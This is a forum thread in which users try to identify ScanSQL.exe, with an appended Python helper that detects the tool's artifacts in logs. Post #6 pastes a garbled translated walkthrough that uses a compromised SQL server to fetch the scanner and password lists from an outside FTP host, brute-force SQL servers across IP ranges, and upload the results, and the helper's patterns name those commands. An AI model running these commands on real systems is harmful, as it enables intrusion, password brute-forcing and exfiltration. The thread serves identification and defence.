
Thread: Scansql.exe what is it

  1. #1
    Junior Member
    Join Date
    Jul 2004
    Posts
    1

    Scansql.exe what is it

    I am an assistant mgr of a PC help group on MSN, and one of the members has been having a problem with a program called SCANSQL.EXE. Can anyone tell me what it's used for so I can inform the said person?

    Regards Drazi1

  2. #2
    0_o Mastermind keezel's Avatar
    Join Date
    Jun 2003
    Posts
    1,024
    I searched Google and there's a tutorial on SQL hacking on governmentsecurity.org that I can't get to and it lists Scansql.exe in the description of the web page. It'd be nice if I could access governmentsecurity.org to actually take a look at the tutorial but I can't even register. Anyway, t'would seem that Scansql.exe is malware of some form. It also seems that it comes from a different country, as most other sites registered with Google that turned up results on "Scansql.exe" were in a foreign language that I didn't recognize. I wish I could help out more but it seems like a strange bug for someone to get.

  3. #3
    Macht Nicht Aus moxnix's Avatar
    Join Date
    May 2002
    Location
    Huson Mt.
    Posts
    1,752
    I couldn't get to that page either, and when I translated the one page, it was a transcript of an IRC conversation that didn't really contain any useful information. The other links my Proxomitron wouldn't let me reach or they came up with a 404 error.

    I'll check Security Focus for it later.
    "Life should NOT be a journey to the grave with the intention of arriving safely in an attractive and well preserved body, but rather to skid in sideways, Champagne in one hand - strawberries in the other, body thoroughly used up, totally worn out and screaming WOO HOO - What a Ride!"
    Author Unknown

  4. #4
    The Doctor Und3ertak3r's Avatar
    Join Date
    Apr 2002
    Posts
    2,744
    Did you try Google?

    Hmm, my initial attempt was all French..

    Found this in a quick search of PacketStorm..

    sqlscan v1.0 is intended to run against Microsoft SQL Server and attempts to connect directly to port 1433. Features the ability to scan one host or an IP list from an input file, the ability to scan for one SQL account password or multiple passwords from a dictionary file, and the ability to create an administrative NT backdoor account on vulnerable hosts, which will fail if xp_cmdshell is disabled on the server.
    from here
    http://www2.packetstormsecurity.org/...Bsearch%5D.y=0

    I know it isn't ScanSql.exe .. I would be asking the person if they are using ANY DATABASE applications.. it may be good, it may be bad.. a check with the software publisher of the database app will tell volumes..

    Cheers
    "Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr

  5. #5
    Junior Member
    Join Date
    Dec 2002
    Posts
    1
    This file is mostly used by FXP groups (hackers)...
    This file gets a list of IPs that were identified as computers who run SQL.
    The file has a built-in list of common user names and passwords.
    What it does is scan every IP it gets and tries on them the list of user names and passwords.
    When it gets in, it creates a log that informs the user about the IP and the user + pass.
    Those hackers are probably using that computer as a remote computer and run their test on it so they can find more computers that are hackable.

  6. #6
    Seems to be a remote scanner thingy.


    Remote Scanning of SQL::
    Remote Scanning of SQL is not different with that from the 21 (see this PAGE ). There is only script (ordering of execution given to the SQL), as well as the logs employed. In this process it is not used Tscan.exe & Kill.exe, but:
    ScanSQL.exe: the scanner.
    SQLpass.dic: library of Password.
    Dict.txt: library of "User ".
    Put besides that and script the technique is identical. To have a IP 21 in anonymous access and of root "to dir: ->Example<- ). A SQL having "FTP.exe" present top. Here how that occurs:
    (for example we will take the IP of the 21 like 0.0.0.0 )
    Once the whole to give the responsability on the ftp to connect itself on the SQL via SQLExec ( here ).
    1 the SQL address - 2 the user name - 3 the pass - 4 the format, which is specific to each SQL - 5 CMD, where the lines of orders are returned

    Here lines of orders to be returned in 5 CMD:
    open echo 0.0.0.0 21> %windir%\system32\filepage.sys
    echo to use anonymous nobody@nowhere.com > > %windir%\system32\filepage.sys
    echo get scansql.exe > > %windir%\system32\filepage.sys
    echo get sqlpass.dic > > %windir%\system32\filepage.sys
    echo get dict.txt > > %windir%\system32\filepage.sys
    echo quit > > %windir%\system32\filepage.sys
    %windir%\system32\filepage.sys type
    ftp - I - N - v - s:%windir%\system32\filepage.sys
    There will be probably error messages of the type SQL_ERROR or SQL_NO_DATA, which is normal.
    But if with standard order the "%windir%\system32\filepage.sys " nothing is posted on the principal window then it will be necessary to change Format ( 4 ), and to start again until it is good.
    SQLExec will block with order " ftp - I - N - v - s:%windir%\system32\filepage.sys " what is normal, it will be released at the end of the loading of the 21 towards the SQL of the 4 files. If all is well to pass the SQL is ready to start with scanner, but for more precautions it is imperative to check if all is there. Here orders of checks:
    to dir scansql.exe
    to dir scansql.txt
    to dir sqlpass.dic
    to dir dict.txt
    If it misses files to you starting again the procedure of transfer. If you look at the lines of orders well it all will not be necessary to remake but just what it is necessary for what it misses. Once made check again.
    If all on the SQL the line of order is here to launch the scanning:
    scansql x.x.x.x y.y.y.y 200
    " X " representing the starting IP of the scan, and " y " the IP of the end of the scan. And 200 the number of Threads (the number of IPs scanned simultaneously).
    For the recuperation of the results of Remote Scanning:
    It is preferable to check and/or recover the results every 24h approximately. For that it will be necessary for you to be connected to the SQL and to return in ( 5 ) CMD the following order to see the file of the results:
    to dir scansql.txt
    If the file scansql.txt has a size of 0, either the scan has stopped or it has not found a SQL yet. If the file has a size, it is enough to transfer it from the SQL towards the 21 in order to recover it. Here are the lines of orders:
    open echo 0.0.0.0 21> %windir%\system32\filepage.sys
    echo to use anonymous nobody@nowhere.com>>%windir%\system32\filepage.sys
    echo could scansql.txt > > %windir%\system32\filepage.sys
    echo quit > > %windir%\system32\filepage.sys
    %windir%\system32\filepage.sys type
    ftp - I - N - v - s:%windir%\system32\filepage.sys
    It should be known that the passes in the library are those which are commonly used. A fear of the lapse of memory which creates a facility.



    Sqlscan.exe is a trojan


    Hope this is what you were looking for.....
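
Added example (not part of any post in this thread, and not the tool's own code): a small Python triage helper that flags the artifacts named in posts #5 and #6 when they show up in process command-line logs or a file listing from a suspect SQL host. The sample log lines, paths and documentation-range IPs are constructed, and the rule and function names are hypothetical.

```python
import re

# File names the thread associates with the scanner, its word lists,
# its result log and the staged FTP script. dict.txt alone is a weak signal.
TOOL_FILES = {"scansql.exe", "sqlpass.dic", "dict.txt", "scansql.txt", "filepage.sys"}
IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
SYS32 = r"(?:%windir%|[a-z]:\\win(?:dows|nt))\\system32\\\S+"

RULES = [
    # echo output redirected into a file under system32 (script being staged)
    ("ftp_script_staged", re.compile(r"\becho\b.*>+\s*" + SYS32, re.I)),
    # ftp client driven by a script file (-s:) instead of an interactive user
    ("ftp_scripted_run", re.compile(r"\bftp(?:\.exe)?\s.*-s:\S+", re.I)),
    # scanner started with a start IP, an end IP and a thread count
    ("scanner_launched", re.compile(rf"\bscansql(?:\.exe)?\s+{IPV4}\s+{IPV4}\s+\d+\b", re.I)),
]

def triage_commands(lines):
    """Return (line_number, rule_name) for every command line that matches a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((n, name))
    return hits

def triage_files(paths):
    """Return the sorted, lower-cased tool file names present in a path listing."""
    found = {re.split(r"[\\/]", p)[-1].lower() for p in paths}
    return sorted(found & TOOL_FILES)

# Constructed sample: command lines as a process-creation log might record them.
SAMPLE_COMMANDS = [
    r"cmd.exe /c echo open 192.0.2.10 21 > %windir%\system32\filepage.sys",
    r"cmd.exe /c echo get scansql.exe >> %windir%\system32\filepage.sys",
    r"cmd.exe /c ftp -i -n -v -s:%windir%\system32\filepage.sys",
    r"cmd.exe /c scansql 198.51.100.1 198.51.100.254 200",
    r"cmd.exe /c dir C:\backups",
]
# Constructed sample: file listing from the same host.
SAMPLE_PATHS = [
    r"C:\WINNT\system32\ScanSQL.exe", r"C:\WINNT\system32\sqlpass.dic",
    r"C:\WINNT\system32\dict.txt", r"C:\WINNT\system32\filepage.sys",
    r"C:\WINNT\system32\drivers\etc\hosts",
]

if __name__ == "__main__":
    print(triage_commands(SAMPLE_COMMANDS))
    print(triage_files(SAMPLE_PATHS))
```

Hits are most meaningful when the parent process is the SQL Server service and several rules fire on the same host within a short window.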
